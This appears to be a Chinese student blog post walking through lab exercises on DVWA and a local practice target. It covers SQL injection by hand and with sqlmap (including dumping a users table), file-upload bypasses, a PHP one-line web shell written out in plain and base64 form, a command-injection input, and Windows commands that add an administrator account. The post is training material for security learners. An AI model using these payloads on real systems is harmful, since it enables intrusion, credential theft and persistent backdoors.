asp.net web submit链接页面_四、常见WEB漏洞-CSDN博客

本文链接：https://blog.csdn.net/weixin_36125445/article/details/112128402

一、SQL注入介绍与初步学习

利用提供的学习资料，在本地环境搭建sqlmap

emmm由于kali自带sqlmap，所以不用搭建了

二、SQL注入的利用与防御

自己搭建靶场或者利用Pockr的靶场分别进行手动和SQLMap的注入尝试

首先，在dvwa中进行手动注入

通过输入1 和 1‘ 可以看出这里是存在注入的

因此，通过输入' union select 1,database()#，让id闭合以及合并select语句，可以得到数据库名

sqlmap注入

尝试用sqlmap盲注。。

首先尝试的是dvwa的sql的get请求（全部使用默认值）

sqlmap -u 'http://192.168.254.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit'

结果返回了要回到登录页面，问我是否继续？？？我就奇怪了，为神马会返回呢？？？

然后我不鸟它直接用默认值

结果就是页面没漏洞。。。。然后我问了下度娘，原来它是要验证cookie值，这个就简单啦，抓一下就好了

然后按照度娘说的格式加上去

sqlmap -u 'http://192.168.254.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie="security=low; PHPSESSID=8n2qdg7o0pb76nla7clsg6inu2"

一路默认值后可以看到目前扫描出了三个漏洞

一个是id存在注入点，错误类型为布尔型。。第二个是错误型，把mysql的大版本号爆出来了。。第三个是时间型，同样把mysql的版本号爆出来了

过了几秒后问我是否测试其他，默认值N后，显示了总结出来的漏洞，也就是上面说的那三个，而且还提供了payload测试

测试一下第二个是啥

我也不知道是什么，大致翻译就是密钥是这个东西把。。测试下第三个把，这个意思就是延迟5秒

这些没啥意思，试试最基础的把数据库爆出来

很快就有了结果。。把我之前部署过的靶场的数据库都爆出来了

然后试试爆表？？？

同样也是非常快。。而且突然发现可以把php版本和apache版本也爆出来

当然，既然要黑别人，最重要的脱裤肯定少不了。。呸。是脱库。。辣鸡输入法

sqlmap -u 'http://192.168.254.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie="security=low; PHPSESSID=8n2qdg7o0pb76nla7clsg6inu2" -D wordpress -T wp_users --dump

结果。。

同时还帮我计算密码的hash值。。不过由于电脑太烂，不是一般的慢。。（听过macbook有buff加成）

最后得出脱库的所有信息。。当然密码算不出来了。。

至于post类型由于靶场没有相应的功能，所有先不弄

上传

利用dvwa中的文件上传模块进行任意文件上传和提权等操作！

首先上传一张照片，可以发现是上传成功的

下面试试上传shell的php脚本，也是可以正常上传，说明Low模式下是没有任何过滤拦截的

下面试试medium模式

通过上传shell.php文件可以看到，网站拦截了非png和jpeg等图片格式的文件

下面通过抓包可以发现，上传图片的时候Content-Type为image/png，告诉客户端实际返回的内容为图片格式

而如果上传php格式文件，Content-Type为application/octet-stream，不是图片格式，所以网页拦截下来

所以可以通过抓包，把Content-Type改为image/png

上传成功

然后通过网页显示的上传地址，连接上网站主机

一句话木马：<?php @eval($_POST['pass']);?>

然后创建一个账户，并且提权（Emmmmm由于linux提权过于困难，改用win环境。。。）

命令：net user 用户名密码 /add（创建用户）

net localgroup administrators 用户名 /add（将用户添加到administrators组）

然后可以看到我们的用户成功添加到administrators组

四、其他文件上传漏洞类型

文件内容绕过

通过cmd的copy aaa.jpg+shell.php bbb.jpg命令，把一张正常的图片与shell文件结合，得到bbb.jpg

然后上传，由于jpg格式并不能作为脚本运行一句话木马，因此上传的时候需要抓包，把jpg改为php

上传成功，并且成功shell

五、命令、代码执行

test1：在电脑上搭建phpstudy环境，将我们提供的源代码直接放在文件夹下。对我们本节课演示的两个漏洞进行练习。

test2：完整的练习从执行到提权的过程！

源代码下载地址：

链接：https://pan.baidu.com/s/1wkt3e87j_Eq8HZwBuvE1Xw 密码：xiit

首先是练习命令执行漏洞

输入：127.0.0.1&chcp 后可以看到，成功返回了ping值以及cmd的返回编码，证明了这个php页面存在命令执行漏洞。

进行创建用户和提权

代码执行漏洞

首先打开靶场。。结果emmmmmm出错

然后仔细看了下。。打开错靶场了。。重新打开正确的靶场发现。。怎么还是错误！！！

然后百度了下这个php源码发现，原来要在后面提交一个参数给cmd。。然后打开大佬说的phpinfo，发现是可以成功执行的，那么就可以开始提权了

由于网站通常都会过滤掉以utf-8格式提交的内容，因此通过百度把一句话木马用base64加密file_put_contents('key.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOz8+'));

这个代码的意思是创建一个名为key的php文件，里面的内容为base64解密后面的字符串

提交后可以发现，这个php页面的当前目录下多了一个key的php文件(不知道为什么百度上的base64加密有很多种算法，导致解密乱码，最后用https://www.sojson.com/base64.html 这个才成功，但是解密后不知道为什么会漏了个>)

然后就可以通过蚁剑连接上来

创建账户、提权

ps：在win server 08 搭建这个源码的时候遇到了一个问题，就是返回的结果是乱码的，而在kali搭建却正常，弄了很久都不知道什么回事，于是就把这个作业放下了（那段时间比较忙，比赛、实训和期末考试），到了暑假玩疯了几天，有一天洗澡的时候突然想到是不是cmd的问题（果然洗手间是最好的灵感地），于是百度了一下，终于弄好了。

方法：新建一个xxx.reg脚本把cmd的输出编码值改成utf-8

脚本：Windows Registry Editor Version 5.00

[HKEY_CURRENT_USERConsole%SystemRoot%_system32_cmd.exe]

"CodePage"=dword:0000fde9

"FontFamily"=dword:00000036

"FontWeight"=dword:00000190

"FaceName"="Consolas"

"ScreenBufferSize"=dword:232900d2

"WindowSize"=dword:002b00d2